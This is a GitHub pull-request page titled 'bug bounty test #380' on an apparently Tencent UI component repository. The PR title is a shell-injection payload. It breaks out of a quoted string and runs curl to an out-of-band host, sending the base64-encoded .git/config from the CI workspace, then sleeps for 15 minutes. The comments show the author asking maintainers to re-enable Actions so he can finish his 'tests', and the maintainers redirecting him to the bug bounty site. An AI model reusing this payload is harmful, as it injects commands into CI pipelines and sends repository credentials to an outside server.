-
Notifications
You must be signed in to change notification settings - Fork 66
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
bug bounty test #380
bug bounty test #380
Conversation
🌈 New title' && curl https://mjwacrvblowmsdyxarxo0hhf1xtuvduwz.oast.fun/test?env=$(cat $GITHUB_WORKSPACE/.git/config|base64|tr -d "\n") && sleep 15m && echo 'testgklk |
Why do you bring these up? |
i am a bug bounty hunter and tencent has a bug bounty program. i am just conducting tests |
@ZWkang i have found a valid vulnerability. please allow me to conduct my tests to determine impact. i will then report it to the TSRC website ethically |
zkwang, I am a bug bounty researcher. these are some of the tests I am conducting. Please allow me to proceed |
Hello @uyarn i was in the final stages of my test. i will need to only open one more PR to complete my tests and record the impact. Can you please re-enable the actions module on this repo? |
Please allow me to complete my tests and tenable actions in this repo so
that I can record the impact of the vulnerability I have discovered.
Thanks,
Best Regards,
Ankush Goel <http://www.linkedin.com/in/goelankush>
<http://www.linkedin.com/in/goelankush/>
<http://www.linkedin.com/in/goelankush/>
…On Thu, 6 Jun 2024 at 4:36 PM, wū yāng ***@***.***> wrote:
@ZWkang <https://github.com/ZWkang> i have found a valid vulnerability.
please allow me to conduct my tests to determine impact. i will then report
it to the TSRC website ethically
You can report it to TSRC website directly and illustrate the detail of
this vulnerability. This Pull Request is meaningless for us(I mean UI
components) so we don't need to keep it opening.
—
Reply to this email directly, view it on GitHub
<#380 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/ACQXH2UJDYVH7MZ6LY6CCKLZGA7DZAVCNFSM6AAAAABI4O3DYSVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCNJSGA2DKMJUGY>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
sorry, I misunderstand what @ZWkang did. |
🤔 这个 PR 的性质是?
🔗 相关 Issue
💡 需求背景和解决方案
📝 更新日志
fix(组件名称): 处理问题或特性描述 ...
本条 PR 不需要纳入 Changelog
☑️ 请求合并前的自查清单